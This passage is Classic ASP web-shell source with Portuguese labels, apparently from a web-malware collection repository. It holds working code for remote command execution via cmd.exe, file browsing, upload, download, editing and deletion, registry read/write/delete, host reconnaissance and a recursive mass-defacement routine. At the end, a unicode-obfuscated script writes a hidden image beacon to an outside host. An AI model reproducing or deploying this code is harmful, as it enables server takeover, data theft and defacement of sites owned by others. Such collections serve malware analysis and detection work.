Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each folderItem in ColFolders
Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
next
Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
marcatabela = true
for each FilesItem0 in ColFiles0
If marcatabela = true then
corfundotabela = " bgcolor=""#EEEEEE"""
Else
corfundotabela = ""
End If
Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
marcatabela = NOT marcatabela
next
Response.Write "</table>"
End If
End Sub
Select Case Trim(Request.QueryString("action"))
Case "get"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
End If
Case "put"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("arquivo")) = "" Then
caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
varpath = Trim(Request.QueryString("path"))
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
for each FilesItem0 in ColFiles0
Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
next
Response.Write "</table>"
Else
destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(arquivo)
MyFile.Copy (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
End If
End If
Case "del"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
MyFile.Delete
If Err.Number = 0 Then
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
End If
Case "ren"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Trim(Request.QueryString("status")) <> "2" Then
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
arquivo = showobj(caminho)
Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
"<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
"<input type=""hidden"" name=""action"" value=""ren"">" & _
"<input type=""hidden"" name=""status"" value=""2"">" & _
"<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>" & _
"Digite o novo nome: <input type=""text"" name=""newname"">" & _
"&nbsp;&nbsp;<input type=""submit"" value=""alterar"">" & _
"</form>"
Else
caminho = Replace(Trim(Request.QueryString("path")),"|","\")
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.QueryString("newname"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>renomeado para<b>: " & destino
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End If
Case "error"
Response.Write "<center><font face='arial' size='2' color='red'> <b>CÓDIGO CORROMPIDO<BR>CORRUPT CODE</font></center>"
Case "cmd"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
szCMD = Request.QueryString(".CMD")
If (szCMD <> "") Then
szTempFile = "c:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET""><input type=""hidden"" name=""action"" value=""cmd""><input type=text name="".CMD"" size=45 value=""" & szCMD & """><input type=submit value=""Run""></FORM><br><br> "
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write "<font face=""arial"">"
Response.Write Replace(Replace(Server.HTMLEncode(oFile.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
Case "info"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshNetwork = Server.CreateObject("WScript.Network")
Set WshShell = Server.CreateObject("WScript.Shell")
Set WshEnv = WshShell.Environment("SYSTEM")
Response.Write "<br><font face=arial size=2>"
Response.Write "<b>IDENTIFICAÇÃO DE REDE:</b><br>"
Response.Write "<b>Usuário: </b>" & WshNetwork.UserName & "<br>"
Response.Write "<b>Nome do Computador: </b>" & WshNetwork.ComputerName & "<br>"
Response.Write "<b>Usuário do Domínio: </b>" & WshNetwork.UserDomain & "<br>"
Set Drives = WshNetwork.EnumNetworkDrives
For i = 0 to Drives.Count - 1
Response.Write "<b>Drive de Rede (Mapeado): </b>" & Drives.Item(i) & "<br>"
Next
Response.Write "<br><b>FÍSICO:</b><br>"
Response.Write "<b>Arquitetura do Processador: </b>" & WshEnv("PROCESSOR_ARCHITECTURE") & "<br>"
Response.Write "<b>Número de Processadores: </b>" & WshEnv("NUMBER_OF_PROCESSORS") & "<br>"
Response.Write "<b>Identificador do Processador: </b>" & WshEnv("PROCESSOR_IDENTIFIER") & "<br>"
Response.Write "<b>Nível do Processador: </b>" & WshEnv("PROCESSOR_LEVEL") & "<br>"
Response.Write "<b>Revisão do Processador: </b>" & WshEnv("PROCESSOR_REVISION") & "<br>"
Response.Write "<br><b>LÓGICO:</b><br>"
Response.Write "<b>IP: </b>" & request.servervariables("LOCAL_ADDR") & "<br>"
Response.Write "<b>Sistema Operacional: </b>" & WshEnv("OS") & "<br>"
Response.Write "<b>Servidor Web: </b>" & request.servervariables("SERVER_SOFTWARE") & "<br>"
Response.Write "<b>Especificação do Command: </b>" & WshShell.ExpandEnvironmentStrings("%ComSpec%") & "<br>"
Response.Write "<b>Caminhos no Path: </b>" & WshEnv("PATH") & "<br>"
Response.Write "<b>Executáveis: </b>" & WshEnv("PATHEXT") & "<br>"
Response.Write "<b>Prompt: </b> " & WshEnv("PROMPT") & "<br>"
Response.Write "<b>System Drive: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMDRIVE%") & "<br>"
Response.Write "<b>System Root: </b>" & WshShell.ExpandEnvironmentStrings("%SYSTEMROOT%") & "<br>"
Response.Write "<b>Caminho do System32: </b>" & WshShell.CurrentDirectory & "<br>"
Set Drives = Nothing
Set WshNetwork = Nothing
Set WshShell = Nothing
Set WshEnv = Nothing
Case "reg"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Set WshShell = Server.CreateObject("WScript.Shell")
Response.Write "<font face=""arial"" size=""2""><b>Editor de Registro:</b><br><br>"
Select Case Trim(Request.QueryString("regaction"))
Case "w"
If Trim(Request.QueryString("process")) = "yes" Then
Select Case Trim(Request.QueryString("type"))
Case "1"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_SZ")
Case "2"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_DWORD")
Case "3"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), CInt(Trim(Request.QueryString("value"))), "REG_BINARY")
Case "4"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_EXPAND_SZ")
Case "5"
teste = WshShell.RegWrite (Trim(Request.QueryString("key")), Trim(Request.QueryString("value")), "REG_MULTI_SZ")
End Select
Response.Write "<center><br><font face=""arial"" size=""2"">Registro <b>"
Response.Write Trim(Request.QueryString("key")) & "</b> Escrito</center>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Else
Response.Write "<table><tr><td><font face=""arial"" size=""2"">ROOT KEY NAME</td><td><font face=""arial"" size=""2"">ABREVIAÇÃO</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_USER </td><td><font face=""arial"" size=""1""> HKCU </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_LOCAL_MACHINE </td><td><font face=""arial"" size=""1""> HKLM </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CLASSES_ROOT </td><td><font face=""arial"" size=""1""> HKCR </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_USERS </td><td><font face=""arial"" size=""1""> HKEY_USERS </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">HKEY_CURRENT_CONFIG </td><td><font face=""arial"" size=""1""> HKEY_CURRENT_CONFIG </td></tr></table><br>"
Response.Write "<table><tr><td><font face=""arial"" size=""2"">Tipo </td><td><font face=""arial"" size=""2""> Descrição </td><td><font face=""arial"" size=""2""> Na forma de </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_SZ </td><td><font face=""arial"" size=""1""> string </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_DWORD </td><td><font face=""arial"" size=""1""> número </td><td><font face=""arial"" size=""1""> inteiro </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_BINARY </td><td><font face=""arial"" size=""1""> valor binário </td><td><font face=""arial"" size=""1""> VBArray de inteiros </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_EXPAND_SZ </td><td><font face=""arial"" size=""1""> string expandível (ex. ""%windir%\\calc.exe"") </td><td><font face=""arial"" size=""1""> string </td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">REG_MULTI_SZ </td><td><font face=""arial"" size=""1""> array de strings </td><td><font face=""arial"" size=""1""> VBArray de strings </td></tr></table>"
Response.Write "<br><br><FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<table><tr><td><font face=""arial"" size=""1"">KEY: </td><td><input type=""text"" name=""key""> <font face=""arial"" size=""1""><br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )</td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">VALUE:</td><td><input type=""text"" name=""value""></td></tr>"
Response.Write "<tr><td><font face=""arial"" size=""1"">TYPE:</td><td><SELECT NAME=""type"">"
Response.Write "<OPTION VALUE=""1"">REG_SZ </option>"
Response.Write "<OPTION VALUE=""2"">REG_DWORD </option>"
Response.Write "<OPTION VALUE=""3"">REG_BINARY </option>"
Response.Write "<OPTION VALUE=""4"">REG_EXPAND_SZ </option>"
Response.Write "<OPTION VALUE=""5"">REG_MULTI_SZ </option></select><br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""w"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes""></td></tr>"
Response.Write "<tr><td></td><td><input type=""submit"" value=""OK""></form></td></tr></table>"
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
End If
Case "r"
If Trim(Request.QueryString("process")) = "yes" Then
Response.Write "<font face=""arial"" size=""2"">" & Trim(Request.QueryString("key")) & "<br>"
Response.Write "Valor: <b>" & WshShell.RegRead (Trim(Request.QueryString("key")))
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> <br>( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""r"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case "d"
If Trim(Request.QueryString("process")) = "yes" Then
teste = WshShell.RegDelete (Trim(Request.QueryString("key")))
Response.Write "Chave <b>" & Trim(Request.QueryString("key")) & " </b>deletada"
Else
Response.Write "<FORM action=""" & Request.ServerVariables("URL") & """ method=""GET"">"
Response.Write "<font face=""arial"" size=""1"">KEY: <input type=""text"" name=""key""> ( ex.: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ProductId )<br>"
Response.Write "<input type=""hidden"" name=""regaction"" value=""d"">"
Response.Write "<input type=""hidden"" name=""action"" value=""reg"">"
Response.Write "<input type=""hidden"" name=""process"" value=""yes"">"
Response.Write "<input type=""submit"" value=""OK""></form>"
End If
Response.Write "<br><br><font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg"">MENU PRINCIPAL</a><br>"
Case Else
Response.Write "<font face=""arial"" size=""1""><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=w"">ESCREVER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=r"">LER CHAVE</a><br><br>"
Response.Write "<a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg&regaction=d"">DELETAR CHAVE</a><br>"
End Select
Set WshShell = Nothing
Case "txtview"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp & "<font face=""arial"" size=""2"">"
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write Replace(Replace(Server.HTMLEncode(a.ReadAll),VbCrLf,"<br>")," ","&nbsp;")
Set a = Nothing
Set fso = Nothing
Case "txtedit"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
If Request.Form.Count = 0 Then
file = Replace(Trim(Request.QueryString("file")),"|","\")
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.OpenTextFile(file)
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<textarea cols='85' rows='25' name=""content"" wrap=""physical"" >" & Server.HTMLEncode(a.ReadAll) & "</textarea><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("file")) & """>"
Response.Write "<input type=""submit"" name=""savemethod"" value=""Save"">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=""submit"" name=""savemethod"" value=""Save as""></form>"
Set a = Nothing
Set fso = Nothing
Else
Select Case Trim(Request.Form("savemethod"))
Case "Save"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
Set objstream = fso.OpenTextFile(Replace(Trim(Request.Form("path")),"|","\"),2)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "Texto salvo: <b>" & Replace(Trim(Request.Form("path")),"|","\") & "</b>"
Case "Save as"
Set fso = CreateObject("Scripting.FileSystemObject")
novotexto = Trim(Request.Form("content"))
novotexto = Split(novotexto,vbCrLf)
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set objstream = fso.CreateTextFile(caminho,true,false)
For i = 0 To UBound(novotexto)
objstream.WriteLine(novotexto(i))
Next
objstream.Close
Set objstream = Nothing
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit"">"
Response.Write "<input type=""text"" name=""filename"" value=""" & showobj(Replace(Trim(Request.Form("path")),"|","\")) & """><br>"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.Form("path")) & """>"
Response.Write "<input type=""submit"" name=""savemethod2"" value=""Save""></form>"
Case Else
caminho = showobjpath(Replace(Trim(Request.Form("path")),"|","\")) & "rhtemptxt.txt"
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
Set MyFile = ObjFSO.GetFile(caminho)
destino = Left(caminho,InStrRev(caminho,"\")) & Trim(Request.Form("filename"))
MyFile.Move (destino)
If Err.Number = 0 Then
Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & destino & "</b> salvo!"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
End If
End Select
End If
Case "download"
Response.Buffer = True
Response.Clear
strFileName = Replace(Trim(Request.QueryString("file")),"|","\")
strFile = Right(strFileName, Len(strFileName) - InStrRev(strFileName,"\"))
strFileType = Request.QueryString("type")
if strFileType = "" then strFileType = "application/download"
Set fso = Server.CreateObject("Scripting.FileSystemObject")
Set f = fso.GetFile(strFilename)
intFilelength = f.size
Set f = Nothing
Set fso = Nothing
Response.AddHeader "Content-Disposition", "attachment; filename=" & strFile
Response.AddHeader "Content-Length", intFilelength
Response.Charset = "UTF-8"
Response.ContentType = strFileType
Set Stream = Server.CreateObject("ADODB.Stream")
Stream.Open
Stream.type = 1
Stream.LoadFromFile strFileName
Response.BinaryWrite Stream.Read
Response.Flush
Stream.Close
Set Stream = Nothing
Case "upload"
If Request.QueryString("processupload") <> "yes" Then
Response.Write "<FORM METHOD=""POST"" ENCTYPE=""multipart/form-data"" ACTION=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&processupload=yes&path=" & Request.QueryString("path") & """>"
Response.Write "<TABLE BORDER=0>"
Response.Write "<tr><td><font face=""arial"" size=""2""><b>Select a file to upload:</b><br><INPUT TYPE=FILE SIZE=50 NAME=""FILE1""></td></tr>"
Response.Write "<tr><td align=""center""><font face=""arial"" size=""2""><INPUT TYPE=SUBMIT VALUE=""Upload!""></td></tr>"
Response.Write "</TABLE>"
Else
Set Uploader = New FileUploader
Uploader.Upload()
If Uploader.Files.Count = 0 Then
Response.Write "File(s) not uploaded."
Else
For Each File In Uploader.Files.Items
File.SaveToDisk Replace(Trim(Request.QueryString("path")),"|","\")
Response.Write "File Uploaded: " & File.FileName & "<br>"
Response.Write "Size: " & File.FileSize & " bytes<br>"
Response.Write "Type: " & File.ContentType & "<br><br>"
Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
Next
End If
End If
Case "mass"
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Sub themassdeface(caminhodomass,metodo,ObjFSO,MeuArquivo)
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminhodomass)
Set ColFolders = MonRep.SubFolders
for each folderItem in ColFolders
destino1 = folderItem.path & "\index.htm"
destino2 = folderItem.path & "\index.html"
destino3 = folderItem.path & "\index.asp"
destino4 = folderItem.path & "\index.cfm"
destino5 = folderItem.path & "\index.php"
destino6 = folderItem.path & "\default.htm"
destino7 = folderItem.path & "\default.html"
destino8 = folderItem.path & "\default.asp"
destino9 = folderItem.path & "\default.cfm"
destino10 = folderItem.path & "\default.php"
MeuArquivo.Copy(destino1)
MeuArquivo.Copy(destino2)
MeuArquivo.Copy(destino3)
MeuArquivo.Copy(destino4)
MeuArquivo.Copy(destino5)
MeuArquivo.Copy(destino6)
MeuArquivo.Copy(destino7)
MeuArquivo.Copy(destino8)
MeuArquivo.Copy(destino9)
MeuArquivo.Copy(destino10)
Response.Write "<table><tr><td><font face='arial' size='2'>&lt;DIR&gt; " & folderItem.path & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>DONE!</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr></table>"
End If
Err.Number = 0
Response.Flush
If metodo = "brute" Then
Call themassdeface(folderItem.path & "\","brute",ObjFSO,MeuArquivo)
End If
next
End Sub
Sub brutemass(caminho,massaction)
If massaction = "test" Then
On Error Resume Next
Set MonRep = ObjFSO.GetFolder(caminho)
Set ColFolders = MonRep.SubFolders
Set ColFiles0 = MonRep.Files
for each folderItem in ColFolders
Set TotalFolders = ObjFSO.GetFolder(folderItem.path)
Set EachFolder = TotalFolders.SubFolders
Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
maindestino = folderItem.path & "\"
MeuArquivo.Copy(maindestino)
Response.Write "<tr><td><b><font face='arial' size='2'>&lt;DIR&gt; " & maindestino & "</b></td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
If EachFolder.count > 0 Then
masscontador = 0
for each subpasta in EachFolder
masscontador = masscontador + 1
destino = subpasta.path & "\"
If masscontador = 1 Then
destinofinal = destino
pathfinal = subpasta.path
Err.Number = 0
MeuArquivo.Copy(destinofinal)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(pathfinal) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
Else
MeuArquivo.Copy(destino)
Response.Write "<tr><td><font face='arial' size='2'>&lt;DIR&gt; " & showobj(subpasta.path) & "</td>"
If Err.Number = 0 Then
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='green'>Acesso Permitido</font></td></tr>"
Else
Response.Write "<td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='2' color='red'>" & UCase(Err.Description) & "</font></td></tr>"
End If
Err.Number = 0
Response.Flush
End If
next
masscontador = 0
End If
Response.Write "</table><br>"
Call brutemass(folderItem.path & "\","test")
next
Set MonRep = Nothing
Set ColFolders = Nothing
Set ColFiles0 = Nothing
Else
If Request.Form.Count = 0 Then
Response.Write "<font face=""arial"" size=""2""><br><br><b>Brute:</b> copia os arquivos do deface para todas as pastas e subpastas (todos os níveis) do diretório escolhido (mais demorado). O tempo do deface vai variar de acordo com o numero TOTAL de diretórios.<br><br>"
Response.Write "<b>Single:</b> copia os arquivos do deface apenas para as pastas (primeiro nível) do diretório escolhido. Não inclui subpastas.<br><br>"
Response.Write "<form method=""post"" action=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc"">"
Response.Write "<input type=""hidden"" name=""path"" value=""" & Trim(Request.QueryString("path")) & """>"
Response.Write "<center><font face=""arial"" size=""2"">Insira o código:<br>"
Response.Write "<textarea cols='65' rows='15' name=""content""></textarea><br>"
Response.Write "<input type=""radio"" name=""massopt"" value=""brute"" checked>Brute&nbsp;&nbsp;&nbsp;"
Response.Write "<input type=""radio"" name=""massopt"" value=""single"">Single<br>"
Response.Write "<input type=""submit"" value=""w00t!""></center>"
Response.Write "</form>"
Else
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivomassdfc = patharquivotxt & "teste.txt"
Set Arquivotxt = ObjFso.OpenTextFile(arquivomassdfc, 2, True, False)
vetordelinhas = Split(Request.Form("content"),VbCrLf)
For i = 0 To UBound(vetordelinhas)
Arquivotxt.WriteLine(vetordelinhas(i))
Next
Set MeuArquivo = ObjFSO.GetFile(arquivomassdfc)
If Request.Form("massopt") = "single" Then
Call themassdeface(caminho,"single",ObjFSO,MeuArquivo)
ElseIf Request.Form("massopt") = "brute" Then
Call themassdeface(caminho,"brute",ObjFSO,MeuArquivo)
End If
End If
End If
End Sub
If Trim(Request.QueryString("massact")) = "test" Then
Set ObjFSO = CreateObject("Scripting.FileSystemObject")
patharquivotxt = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
arquivo = patharquivotxt & "_vti_cnf.log"
Set Arquivotxt = ObjFSO.CreateTextFile(arquivo,True)
Set MeuArquivo = ObjFSO.GetFile(arquivo)
Call brutemass(Replace(Trim(Request.QueryString("path")),"|","\"),"test")
ElseIf Trim(Request.QueryString("massact")) = "dfc" Then
Call brutemass(Replace(Trim(Request.Form("path")),"|","\"),"dfc")
End If
Case Else
checa = checking(cprthtml,keydec)
Call hdr()
Response.Write copyright & onlinehelp
Call showcontent()
End Select
If Err.Number <> 0 Then
Response.Write "<br><font face='arial' size='2'>ERRO: " & Err.Number & "<br><br><b>" & UCase(Err.Description) & "</b><br>Acesse o <b>ONLINE HELP</b> para a explicação do erro"
End If
Response.Write endcode
%>
<script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>

137
web-malware-collection-13-06-2012/ASP/up.asp Normal file
View file

@ -0,0 +1,137 @@
<!--
ASP_KIT
